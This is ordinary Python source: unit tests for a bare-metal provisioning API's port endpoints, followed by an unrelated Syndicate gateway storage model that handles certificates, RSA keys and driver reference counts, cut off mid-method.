def test_create_port_portgroup_different_nodes(self, mock_create):
pdict = post_get_test_port(
portgroup_uuid=self.portgroup.uuid,
node_uuid=uuidutils.generate_uuid())
response = self.post_json('/ports', pdict, headers=self.headers,
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertFalse(mock_create.called)
def test_create_port_portgroup_old_api_version(self, mock_create):
pdict = post_get_test_port(
portgroup_uuid=self.portgroup.uuid,
node_uuid=self.node.uuid
)
headers = {api_base.Version.string: '1.15'}
response = self.post_json('/ports', pdict, expect_errors=True,
headers=headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
self.assertFalse(mock_create.called)
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_create_port_address_already_exist(self, mock_notify, mock_create):
address = 'AA:AA:AA:11:22:33'
mock_create.side_effect = exception.MACAlreadyExists(mac=address)
pdict = post_get_test_port(address=address, node_id=self.node.id)
response = self.post_json('/ports', pdict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.CONFLICT, response.status_int)
self.assertEqual('application/json', response.content_type)
error_msg = response.json['error_message']
self.assertTrue(error_msg)
self.assertIn(address, error_msg.upper())
self.assertTrue(mock_create.called)
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid,
portgroup_uuid=pdict['portgroup_uuid']),
mock.call(mock.ANY, mock.ANY, 'create',
obj_fields.NotificationLevel.ERROR,
obj_fields.NotificationStatus.ERROR,
node_uuid=self.node.uuid,
portgroup_uuid=pdict['portgroup_uuid'])])
def test_create_port_with_internal_field(self, mock_create):
pdict = post_get_test_port()
pdict['internal_info'] = {'a': 'b'}
response = self.post_json('/ports', pdict, expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_create.called)
def test_create_port_some_invalid_local_link_connection_key(self,
mock_create):
pdict = post_get_test_port(
local_link_connection={'switch_id': 'value1',
'port_id': 'Ethernet1/15',
'switch_foo': 'value3'})
response = self.post_json('/ports', pdict, expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_create.called)
def test_create_port_local_link_connection_keys(self, mock_create):
pdict = post_get_test_port(
local_link_connection={'switch_id': '0a:1b:2c:3d:4e:5f',
'port_id': 'Ethernet1/15',
'switch_info': 'value3'})
response = self.post_json('/ports', pdict, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
def test_create_port_local_link_connection_switch_id_bad_mac(self,
mock_create):
pdict = post_get_test_port(
local_link_connection={'switch_id': 'zz:zz:zz:zz:zz:zz',
'port_id': 'Ethernet1/15',
'switch_info': 'value3'})
response = self.post_json('/ports', pdict, expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertTrue(response.json['error_message'])
self.assertFalse(mock_create.called)
def test_create_port_local_link_connection_missing_mandatory(self,
mock_create):
pdict = post_get_test_port(
local_link_connection={'switch_id': '0a:1b:2c:3d:4e:5f',
'switch_info': 'fooswitch'})
response = self.post_json('/ports', pdict, expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertFalse(mock_create.called)
def test_create_port_local_link_connection_missing_optional(self,
mock_create):
pdict = post_get_test_port(
local_link_connection={'switch_id': '0a:1b:2c:3d:4e:5f',
'port_id': 'Ethernet1/15'})
response = self.post_json('/ports', pdict, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
def test_create_port_with_llc_old_api_version(self, mock_create):
headers = {api_base.Version.string: '1.14'}
pdict = post_get_test_port(
local_link_connection={'switch_id': '0a:1b:2c:3d:4e:5f',
'port_id': 'Ethernet1/15'})
response = self.post_json('/ports', pdict, headers=headers,
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
self.assertFalse(mock_create.called)
def test_create_port_with_pxe_enabled_old_api_version(self, mock_create):
headers = {api_base.Version.string: '1.14'}
pdict = post_get_test_port(pxe_enabled=False)
del pdict['local_link_connection']
del pdict['portgroup_uuid']
response = self.post_json('/ports', pdict, headers=headers,
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
self.assertFalse(mock_create.called)
def test_create_port_with_physical_network(self, mock_create):
physical_network = 'physnet1'
pdict = post_get_test_port(
physical_network=physical_network,
node_uuid=self.node.uuid)
response = self.post_json('/ports', pdict, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
self.assertEqual(physical_network, response.json['physical_network'])
port = objects.Port.get(self.context, pdict['uuid'])
self.assertEqual(physical_network, port.physical_network)
def test_create_port_with_physical_network_old_api_version(self,
mock_create):
headers = {api_base.Version.string: '1.33'}
pdict = post_get_test_port(physical_network='physnet1')
response = self.post_json('/ports', pdict, headers=headers,
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
self.assertFalse(mock_create.called)
@mock.patch.object(objects.Port, 'supports_physical_network')
def test_create_port_with_physical_network_upgrade(self, mock_spn,
mock_create):
mock_spn.return_value = False
pdict = post_get_test_port(physical_network='physnet1')
response = self.post_json('/ports', pdict, headers=self.headers,
expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.NOT_ACCEPTABLE, response.status_int)
self.assertFalse(mock_create.called)
def test_portgroups_subresource_post(self, mock_create):
headers = {api_base.Version.string: '1.24'}
pdict = post_get_test_port()
response = self.post_json('/portgroups/%s/ports' % self.portgroup.uuid,
pdict, headers=headers, expect_errors=True)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
self.assertFalse(mock_create.called)
@mock.patch.object(common_utils, 'warn_about_deprecated_extra_vif_port_id',
autospec=True)
def test_create_port_with_extra_vif_port_id_deprecated(self, mock_warn,
mock_create):
pdict = post_get_test_port(pxe_enabled=False,
extra={'vif_port_id': 'foo'})
response = self.post_json('/ports', pdict, headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.CREATED, response.status_int)
self.assertEqual(1, mock_warn.call_count)
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
def _test_create_port(self, mock_create, has_vif=False, in_portgroup=False,
pxe_enabled=True, standalone_ports=True,
http_status=http_client.CREATED):
extra = {}
if has_vif:
extra = {'vif_port_id': uuidutils.generate_uuid()}
pdict = post_get_test_port(
node_uuid=self.node.uuid,
pxe_enabled=pxe_enabled,
extra=extra)
if not in_portgroup:
pdict.pop('portgroup_uuid')
else:
self.portgroup.standalone_ports_supported = standalone_ports
self.portgroup.save()
expect_errors = http_status != http_client.CREATED
response = self.post_json('/ports', pdict, headers=self.headers,
expect_errors=expect_errors)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_status, response.status_int)
if not expect_errors:
expected_portgroup_uuid = pdict.get('portgroup_uuid', None)
self.assertEqual(expected_portgroup_uuid,
response.json['portgroup_uuid'])
self.assertEqual(extra, response.json['extra'])
mock_create.assert_called_once_with(mock.ANY, mock.ANY, mock.ANY,
'test-topic')
else:
self.assertFalse(mock_create.called)
def test_create_port_novif_pxe_noportgroup(self, mock_create):
self._test_create_port(mock_create, has_vif=False, in_portgroup=False,
pxe_enabled=True,
http_status=http_client.CREATED)
def test_create_port_novif_nopxe_noportgroup(self, mock_create):
self._test_create_port(mock_create, has_vif=False, in_portgroup=False,
pxe_enabled=False,
http_status=http_client.CREATED)
def test_create_port_vif_pxe_noportgroup(self, mock_create):
self._test_create_port(mock_create, has_vif=True, in_portgroup=False,
pxe_enabled=True,
http_status=http_client.CREATED)
def test_create_port_vif_nopxe_noportgroup(self, mock_create):
self._test_create_port(mock_create, has_vif=True, in_portgroup=False,
pxe_enabled=False,
http_status=http_client.CREATED)
def test_create_port_novif_pxe_portgroup_standalone_ports(self,
mock_create):
self._test_create_port(mock_create, has_vif=False, in_portgroup=True,
pxe_enabled=True,
standalone_ports=True,
http_status=http_client.CREATED)
def test_create_port_novif_pxe_portgroup_nostandalone_ports(self,
mock_create):
self._test_create_port(mock_create, has_vif=False, in_portgroup=True,
pxe_enabled=True,
standalone_ports=False,
http_status=http_client.CONFLICT)
def test_create_port_novif_nopxe_portgroup_standalone_ports(self,
mock_create):
self._test_create_port(mock_create, has_vif=False, in_portgroup=True,
pxe_enabled=False,
standalone_ports=True,
http_status=http_client.CREATED)
def test_create_port_novif_nopxe_portgroup_nostandalone_ports(self,
mock_create):
self._test_create_port(mock_create, has_vif=False, in_portgroup=True,
pxe_enabled=False,
standalone_ports=False,
http_status=http_client.CREATED)
def test_create_port_vif_pxe_portgroup_standalone_ports(self, mock_create):
self._test_create_port(mock_create, has_vif=True, in_portgroup=True,
pxe_enabled=True,
standalone_ports=True,
http_status=http_client.CREATED)
def test_create_port_vif_pxe_portgroup_nostandalone_ports(self,
mock_create):
self._test_create_port(mock_create, has_vif=True, in_portgroup=True,
pxe_enabled=True,
standalone_ports=False,
http_status=http_client.CONFLICT)
def test_create_port_vif_nopxe_portgroup_standalone_ports(self,
mock_create):
self._test_create_port(mock_create, has_vif=True, in_portgroup=True,
pxe_enabled=False,
standalone_ports=True,
http_status=http_client.CREATED)
def test_create_port_vif_nopxe_portgroup_nostandalone_ports(self,
mock_create):
self._test_create_port(mock_create, has_vif=True, in_portgroup=True,
pxe_enabled=False,
standalone_ports=False,
http_status=http_client.CONFLICT)
def test_create_port_invalid_physnet_non_text(self, mock_create):
physnet = 1234
pdict = post_get_test_port(physical_network=physnet)
response = self.post_json('/ports', pdict, expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertIn('should be string', response.json['error_message'])
self.assertFalse(mock_create.called)
def test_create_port_invalid_physnet_too_long(self, mock_create):
physnet = 'p' * 65
pdict = post_get_test_port(physical_network=physnet)
response = self.post_json('/ports', pdict, expect_errors=True,
headers=self.headers)
self.assertEqual('application/json', response.content_type)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertIn('maximum character', response.json['error_message'])
self.assertFalse(mock_create.called)
@mock.patch.object(rpcapi.ConductorAPI, 'destroy_port')
class TestDelete(test_api_base.BaseApiTest):
def setUp(self):
super(TestDelete, self).setUp()
self.node = obj_utils.create_test_node(self.context)
self.port = obj_utils.create_test_port(self.context,
node_id=self.node.id)
gtf = mock.patch.object(rpcapi.ConductorAPI, 'get_topic_for')
self.mock_gtf = gtf.start()
self.mock_gtf.return_value = 'test-topic'
self.addCleanup(gtf.stop)
def test_delete_port_byaddress(self, mock_dpt):
response = self.delete('/ports/%s' % self.port.address,
expect_errors=True)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn(self.port.address, response.json['error_message'])
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_delete_port_byid(self, mock_notify, mock_dpt):
self.delete('/ports/%s' % self.port.uuid, expect_errors=True)
self.assertTrue(mock_dpt.called)
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid,
portgroup_uuid=None),
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.END,
node_uuid=self.node.uuid,
portgroup_uuid=None)])
@mock.patch.object(notification_utils, '_emit_api_notification')
def test_delete_port_node_locked(self, mock_notify, mock_dpt):
self.node.reserve(self.context, 'fake', self.node.uuid)
mock_dpt.side_effect = exception.NodeLocked(node='fake-node',
host='fake-host')
ret = self.delete('/ports/%s' % self.port.uuid, expect_errors=True)
self.assertEqual(http_client.CONFLICT, ret.status_code)
self.assertTrue(ret.json['error_message'])
self.assertTrue(mock_dpt.called)
mock_notify.assert_has_calls([mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.INFO,
obj_fields.NotificationStatus.START,
node_uuid=self.node.uuid,
portgroup_uuid=None),
mock.call(mock.ANY, mock.ANY, 'delete',
obj_fields.NotificationLevel.ERROR,
obj_fields.NotificationStatus.ERROR,
node_uuid=self.node.uuid,
portgroup_uuid=None)])
def test_portgroups_subresource_delete(self, mock_dpt):
portgroup = obj_utils.create_test_portgroup(self.context,
node_id=self.node.id)
port = obj_utils.create_test_port(self.context, node_id=self.node.id,
uuid=uuidutils.generate_uuid(),
portgroup_id=portgroup.id,
address='52:55:00:cf:2d:31')
headers = {api_base.Version.string: '1.24'}
response = self.delete(
'/portgroups/%(portgroup)s/ports/%(port)s' %
{'portgroup': portgroup.uuid, 'port': port.uuid},
headers=headers, expect_errors=True)
self.assertEqual(http_client.FORBIDDEN, response.status_int)
self.assertEqual('application/json', response.content_type)
| |
#!/usr/bin/python
"""
Copyright 2013 The Trustees of Princeton University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import storage.storagetypes as storagetypes
import os
import base64
import urllib
import uuid
import json
from Crypto.Hash import SHA256 as HashAlg
from Crypto.PublicKey import RSA as CryptoKey
from Crypto import Random
from Crypto.Signature import PKCS1_PSS as CryptoSigner
import types
import errno
import time
import datetime
import random
import logging
import string
import binascii
import traceback
from common.msconfig import *
def is_int( x ):
try:
y = int(x)
return True
except:
return False
class GatewayNameHolder( storagetypes.Object ):
'''
Mark a Gateway's name as in use
'''
name = storagetypes.String()
g_id = storagetypes.Integer()
required_attrs = [
"name"
]
@classmethod
def make_key_name( cls, name ):
return "GatewayNameHolder: name=%s" % (name)
@classmethod
def create_async( cls, _name, _id ):
return GatewayNameHolder.get_or_insert_async( GatewayNameHolder.make_key_name( _name ), name=_name, g_id=_id )
class GatewayDriver( storagetypes.Object):
"""
Gateway driver, addressed by hash.
"""
driver_hash = storagetypes.String() # hex string
driver_text = storagetypes.Blob()
refcount = storagetypes.Integer()
@classmethod
def hash_driver( cls, driver_text ):
h = HashAlg.new()
h.update( driver_text )
return h.hexdigest()
@classmethod
def make_key_name( cls, driver_hash ):
return "GatewayDriver: hash=%s" % (driver_hash)
@classmethod
def create_or_ref( cls, _text ):
"""
Create a new driver, or re-ref the existing one.
Do so atomically.
"""
driver_hash = cls.hash_driver( _text )
def txn():
dk = storagetypes.make_key( GatewayDriver, GatewayDriver.make_key_name( driver_hash ) )
d = dk.get()
f = None
if d is None:
d = GatewayDriver( key=dk, driver_hash=driver_hash, driver_text=_text, refcount=1 )
d.put()
else:
d.refcount += 1
d.put()
return d
return storagetypes.transaction( txn )
@classmethod
def ref( cls, driver_hash ):
"""
Increment reference count.
Do this in an "outer" transaction (i.e. Gateway.Update)
"""
dk = storagetypes.make_key( GatewayDriver, cls.make_key_name( driver_hash ) )
d = dk.get()
if d is None:
return False
d.refcount += 1
d.put()
return True
@classmethod
def unref( cls, driver_hash ):
"""
Unref a driver
Delete it if its ref count goes non-positive.
Do this in an "outer" transaction (i.e. Gateway.Delete, Gateway.Update)
"""
dk = storagetypes.make_key( GatewayDriver, cls.make_key_name( driver_hash ) )
d = dk.get()
if d is None:
return True
d.refcount -= 1
if d.refcount <= 0:
dk.delete()
else:
d.put()
return True
@classmethod
def unref_async( cls, driver_hash ):
"""
Unref a driver, asynchronously
Delete it if its ref count goes non-positive.
Do this in an "outer" transaction (i.e. Gateway.Delete, Gateway.Update)
"""
dk = storagetypes.make_key( GatewayDriver, cls.make_key_name( driver_hash ) )
d = dk.get()
if d is None:
return True
d.ref -= 1
if d.ref <= 0:
d.delete_async()
else:
d.put_async()
return True
class Gateway( storagetypes.Object ):
# signed gateaway certificate from the user
gateway_cert = storagetypes.Blob() # protobuf'ed gateway certificate generated and signed by the gateway owner upon creation
# all of the below information is derived from the above signed gateway certificate.
# it is NOT filled in by any method.
gateway_type = storagetypes.Integer(default=0)
owner_id = storagetypes.Integer(default=-1) # ID of the SyndicateUser that owns this gateway
host = storagetypes.String()
port = storagetypes.Integer()
name = storagetypes.String() # name of this gateway
g_id = storagetypes.Integer()
volume_id = storagetypes.Integer(default=-1)
deleted = storagetypes.Boolean(default=False)
gateway_public_key = storagetypes.Text() # PEM-encoded RSA public key to verify control-plane messages (metadata) sent from this gateway.
caps = storagetypes.Integer(default=0) # capabilities
cert_expires = storagetypes.Integer(default=-1) # -1 means "never expires"
cert_version = storagetypes.Integer( default=1 ) # certificate-related version of this gateway
driver_hash = storagetypes.String() # driver hash for this gateway (addresses GatewayDriver). hex string, not byte string
need_cert = storagetypes.Boolean(default=False) # whether or not other gateways in the volume need this gateway's certificate (i.e. will this gateway ever serve data)
# for RPC
key_type = "gateway"
required_attrs = [
"gateway_cert"
]
read_attrs_api_required = [
"driver_hash",
"host",
"port",
"owner_id",
"g_id",
"gateway_type",
"volume_id",
"cert_version",
"cert_expires",
"caps",
]
read_attrs = [
"gateway_public_key",
"name",
] + read_attrs_api_required
# fields an API call can set
write_attrs = [
"gateway_cert"
]
# attrs from the cert that are allowed to change between cert versions
modifiable_cert_attrs = [
"gateway_type",
"host",
"port",
"caps",
"cert_expires",
"cert_version",
"driver_hash",
"gateway_public_key"
]
write_attrs_api_required = write_attrs
default_values = {
"gateway_cert": ""
}
key_attrs = [
"g_id"
]
validators = {
"name": (lambda cls, value: len( unicode(value).translate(dict((ord(char), None) for char in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-.: ")) ) == 0 \
and not is_int(value) \
and len(value) > 0 ),
"gateway_public_key": (lambda cls, value: Gateway.is_valid_key( value, GATEWAY_RSA_KEYSIZE ) )
}
@classmethod
def needs_cert( cls, gateway_type, caps ):
"""
Given a gateway's capabilities, will another gateway need its certificate?
"""
if (caps & (GATEWAY_CAP_WRITE_METADATA | GATEWAY_CAP_WRITE_DATA | GATEWAY_CAP_COORDINATE)) != 0:
return True
return False
def owned_by( self, user ):
return user.owner_id == self.owner_id
def load_pubkey( self, pubkey_str, in_base64=True ):
"""
Load a PEM-encoded RSA public key.
if in_base64 == True, then try to base64-decode it first (i.e. the PEM-encoded
public key is itself base64-encoded again)
return 0 on success
return -EINVAL if the key is invalid
return -EEXIST if the key is the same as the one we have in this Gateway
"""
pubkey_str_unencoded = None
if in_base64:
pubkey_str_unencoded = base64.b64decode( pubkey_str )
else:
pubkey_str_unencoded = pubkey_str
if not Gateway.is_valid_key( pubkey_str_unencoded, GATEWAY_RSA_KEYSIZE ):
return -errno.EINVAL
new_public_key = CryptoKey.importKey( pubkey_str_unencoded ).exportKey()
if self.gateway_public_key is not None and new_public_key == self.gateway_public_key:
return -errno.EEXIST
self.gateway_public_key = new_public_key
return 0
def protobuf_cert( self, cert_pb ):
"""
Populate an ms_gateway_cert structure from our cert
"""
gateway_cert_pb = ms_pb2.ms_gateway_cert.ParseFromString( self.gateway_cert )
cert_pb.CopyFrom( gateway_cert_pb )
def check_caps( self, caps ):
"""
Given a bitmask of caps, verify that all of them are met by our caps.
"""
return (self.caps & caps) == caps
def verify_message( self, msg ):
"""
Verify the authenticity of a received message with a signature field (which should store a base64-encoded signature)
"""
sig = msg.signature
sig_bin = base64.b64decode( sig )
msg.signature = ""
msg_str = msg.SerializeToString()
ret = self.auth_verify( self.gateway_public_key, msg_str, sig_bin )
msg.signature = sig
return ret
def authenticate_session( self, g_type, g_id, url, signature_b64 ):
"""
Verify that the signature over the constructed string "${g_type}_${g_id}:${url}"
was signed by this gateway's private key.
"""
sig = base64.b64decode( signature_b64 )
data = "%s_%s:%s" % (g_type, g_id, url)
ret = self.auth_verify( self.gateway_public_key, data, sig )
return ret
@classmethod
def cert_to_dict( cls, gateway_cert ):
"""
Convert a protobuf structure to a dict of values,
using the Gateway property names.
"""
# unpack certificate
cert_version = gateway_cert.version
gateway_name = gateway_cert.name
gateway_type = gateway_cert.gateway_type
gateway_id = gateway_cert.gateway_id
host = gateway_cert.host
port = gateway_cert.port
pubkey_pem = gateway_cert.public_key
cert_expires = gateway_cert.cert_expires
requested_caps = gateway_cert.caps
driver_hash = binascii.hexlify( gateway_cert.driver_hash )
volume_id = gateway_cert.volume_id
owner_id = gateway_cert.owner_id
kwargs = {
"cert_version": cert_version,
"name": gateway_name,
"gateway_type": gateway_type,
"host": host,
"port": port,
"gateway_public_key": pubkey_pem,
"cert_expires": cert_expires,
"caps": requested_caps,
"driver_hash": driver_hash,
"volume_id": volume_id,
"owner_id": owner_id,
"g_id": gateway_id,
"gateway_cert": gateway_cert.SerializeToString()
}
return kwargs
@classmethod
def Create( cls, user, volume, gateway_cert, driver_text ):
"""
Create a gateway, using its user-signed gateway certificate.
NOTE: the caller must verify the authenticity of the certificate.
"""
kwargs = cls.cert_to_dict( gateway_cert )
# sanity check
if kwargs['volume_id'] != volume.volume_id:
raise Exception("Volume ID mismatch: cert has %s; expected %s" % (kwargs['volume_id'], volume.volume_id))
if kwargs['owner_id'] != user.owner_id:
raise Exception("User ID mismatch: cert has %s; expected %s" % (kwargs['owner_id'], user.owner_id) )
# sanity check: do we have everything we need?
missing = cls.find_missing_attrs( kwargs )
if len(missing) != 0:
raise Exception( "Missing attributes: %s" % (", ".join( missing )))
# sanity check: are our fields valid?
invalid = cls.validate_fields( kwargs )
if len(invalid) != 0:
raise Exception( "Invalid values for fields: %s" % (", ".join( invalid )) )
# sanity check: does the driver match the driver's hash in the cert?
if driver_text is not None:
driver_hash = GatewayDriver.hash_driver( driver_text )
if driver_hash != binascii.hexlify( gateway_cert.driver_hash ):
raise Exception("Driver hash mismatch: len = %s, expected = %s, got = %s" % (len(driver_text), driver_hash, binascii.hexlify( cert.driver_hash )))
gateway_type = kwargs['gateway_type']
# enforce cert distribution
kwargs['need_cert'] = Gateway.needs_cert( gateway_type, kwargs['caps'] )
g_id = kwargs['g_id']
g_key_name = Gateway.make_key_name( g_id=g_id )
g_key = storagetypes.make_key( cls, g_key_name )
# create a nameholder and this gateway at once---there's a good chance we'll succeed
futs = []
gateway_nameholder_fut = GatewayNameHolder.create_async( kwargs['name'], g_id )
gateway_fut = cls.get_or_insert_async( g_key_name, **kwargs )
futs = [gateway_nameholder_fut, gateway_fut]
gateway_driver = None
if driver_text is not None:
gateway_driver = GatewayDriver.create_or_ref( driver_text )
# wait for operations to complete
storagetypes.wait_futures( futs )
# check for collision...
gateway_nameholder = gateway_nameholder_fut.get_result()
gateway = gateway_fut.get_result()
to_rollback = []
if gateway_driver is not None:
to_rollback.append( gateway_driver.key )
if gateway_nameholder.g_id != g_id:
# name collision...
to_rollback.append( g_key )
storagetypes.deferred.defer( Gateway.delete_all, to_rollback )
raise Exception( "Gateway '%s' already exists!" % kwargs['name'] )
if gateway.g_id != g_id:
# ID collision...
to_rollback.append( gateway_nameholder.key )
to_rollback.append( g_key )
storagetypes.deferred.defer( Gateway.delete_all, to_rollback )
raise Exception( "Gateway ID collision. Please try again." )
# we're good!
return g_key
@classmethod
@storagetypes.concurrent
def Read_Async( cls, key, deleted=False ):
gw = yield key.get_async()
if gw is None:
storagetypes.concurrent_return(None)
if gw.deleted and not deleted:
storagetypes.concurrent_return(None)
storagetypes.concurrent_return(gw)
@classmethod
def Read( cls, g_name_or_id, async=False, use_memcache=True, deleted=False ):
"""
Given a Gateway name or ID, read its record. Optionally cache it.
"""
# id or name?
gateway_id = None
gateway_name = None
try:
g_id = int( g_name_or_id )
except:
gateway_name = g_name_or_id
return cls.Read_ByName( gateway_name, async=async, use_memcache=use_memcache )
key_name = Gateway.make_key_name( g_id=g_id )
g = None
if use_memcache:
g = storagetypes.memcache.get( key_name )
if g is not None and not deleted and g.deleted:
storagetypes.memcache.delete( key_name )
g = None
if g is None:
g_key = storagetypes.make_key( cls, Gateway.make_key_name( g_id=g_id ) )
if async:
g_fut = cls.Read_Async( g_key, deleted=deleted )
return g_fut
else:
g = g_key.get( use_memcache=False )
if g is None:
logging.error("Gateway %s not found at all!" % g_id)
if g.deleted:
g = None
elif use_memcache and g is not None:
storagetypes.memcache.set( key_name, g )
else:
if g is not None and not deleted and g.deleted:
storagetypes.memcache.delete( key_name )
g = None
if async:
if g is None or (not deleted and g.deleted):
g = storagetypes.FutureWrapper( None )
else:
g = storagetypes.FutureWrapper( g )
else:
if g is not None and g.deleted:
g = None
return g
@classmethod
def Read_ByName_name_cache_key( cls, gateway_name ):
g_name_to_id_cache_key = "Read_ByName: Gateway: %s" % gateway_name
return g_name_to_id_cache_key
@classmethod
def Read_ByName( cls, gateway_name, async=False, use_memcache=True ):
"""
Given a gateway name, look it up and optionally cache it.
"""
g_name_to_id_cache_key = None
if use_memcache:
g_name_to_id_cache_key = Gateway.Read_ByName_name_cache_key( gateway_name )
g_id = storagetypes.memcache.get( g_name_to_id_cache_key )
if g_id != None and isinstance( g_id, int ):
return cls.Read( g_id, async=async, use_memcache=use_memcache )
# no dice
if async:
g_fut = cls.ListAll( {"Gateway.name ==": gateway_name, "Gateway.deleted ==": False}, async=async )
return storagetypes.FutureQueryWrapper( g_fut )
else:
g = cls.ListAll( {"Gateway.name ==": gateway_name, "Gateway.deleted ==": False}, async=async )
if len(g) > 1:
raise Exception( "More than one Gateway named '%s'" % (gateway_name) )
if g:
g = g[0]
else:
g = None
if use_memcache:
if g:
to_set = {
g_name_to_id_cache_key: g.g_id,
Gateway.make_key_name( g_id=g_id ): g
}
storagetypes.memcache.set_multi( to_set )
return g
@classmethod
def ReadDriver( cls, driver_hash ):
"""
Given a driver's hash, return the driver.
"""
driver_hash = driver_hash.lower()
driver_key_name = GatewayDriver.make_key_name( driver_hash )
driver = storagetypes.memcache.get( driver_key_name )
if driver is not None:
return driver
driver_key = storagetypes.make_key( GatewayDriver, driver_key_name )
driver = driver_key.get()
if driver is None:
return None
driver_text = driver.driver_text
if driver is not None:
storagetypes.memcache.set( driver_key_name, driver_text )
return driver_text
@classmethod
def SetCache( cls, g_id, gateway ):
"""
Cache a loaded gateway.
"""
gateway_key_name = Gateway.make_key_name( g_id=g_id )
storagetypes.memcache.set(gateway_key_name, gateway)
@classmethod
def FlushCache( cls, g_id ):
"""
Purge cached copies of this gateway
"""
gateway_key_name = Gateway.make_key_name( g_id=g_id )
storagetypes.memcache.delete(gateway_key_name)
@classmethod
def FlushCacheDriver( cls, driver_hash ):
"""
Purge cached copies of this gateway's driver
"""
driver_key_name = GatewayDriver.make_key_name( driver_hash )
storagetypes.memcache.delete(driver_key_name)
@classmethod
def Update( cls, gateway_cert, new_driver=None ):
'''
Update a gateway identified by ID with a new certificate.
Do not call this method directly.
Return the gateway record's key on success
Raise an exception on error.
NOTE: the caller must verify the authenticity of the certificate.
Only the volume owner should be able to update a gateway cert's capabilities.
'''
fields = cls.cert_to_dict( gateway_cert )
g_id = fields['g_id']
# validate...
invalid = cls.validate_fields( fields )
if len(invalid) != 0:
raise Exception( "Invalid values for fields: %s" % (", ".join( invalid )) )
new_driver_hash = None
old_driver_hash = None
# sanity check...
if new_driver is not None:
new_driver_hash = GatewayDriver.hash_driver( new_driver )
if binascii.hexlify( gateway_cert.driver_hash ) != new_driver_hash:
raise Exception("Certificate driver hash mismatch: expected %s, got %s" % (binascii.hexlify( gateway_cert.driver_hash ), new_driver_hash))
# drop cert; we'll store it separately
gateway_cert_bin = fields['gateway_cert']
del fields['gateway_cert']
def update_txn( fields ):
'''
Update the Gateway transactionally.
'''
g_id = fields['g_id']
gateway = cls.Read(g_id)
if gateway is None:
# gateway does not exist...
raise Exception("No Gateway with the ID %d exists.", g_id)
old_driver_hash = gateway.driver_hash
# verify update
unwriteable = []
for (k, v) in fields.items():
if k not in cls.modifiable_cert_attrs and getattr(gateway, k) != v:
unwriteable.append(k)
if len(unwriteable) > 0:
raise Exception("Tried to modify read-only fields: %s" % ",".join(unwriteable))
# sanity check: valid version?
if gateway.cert_version >= gateway_cert.version:
raise Exception("Stale Gateway certificate: expected > %s; got %s" % (gateway.cert_version, gateway_cert.version))
# apply update
for (k,v) in fields.items():
setattr( gateway, k, v )
gateway.need_cert = cls.needs_cert( gateway.gateway_type, fields['caps'] )
gateway.gateway_cert = gateway_cert_bin
gw_key = gateway.put()
if old_driver_hash is not None:
# unref the old one
GatewayDriver.unref( old_driver_hash )
cls.FlushCacheDriver( old_driver_hash )
# purge from cache
cls.FlushCache( g_id )
return gw_key
gateway_key = None
try:
gateway_key = storagetypes.transaction( lambda: update_txn( fields ), xg=True )
assert gateway_key is not None, "Transaction failed"
except Exception, e:
logging.exception( e )
raise e
# update the driver as well
if new_driver is not None:
GatewayDriver.create_or_ref( new_driver )
return gateway_key
@classmethod
def Delete( cls, g_name_or_id ):
"""
Given a gateway ID, delete the corresponding gateway.
That is, set it's "deleted" flag so it no longer gets read.
Unref the driver as well.
"""
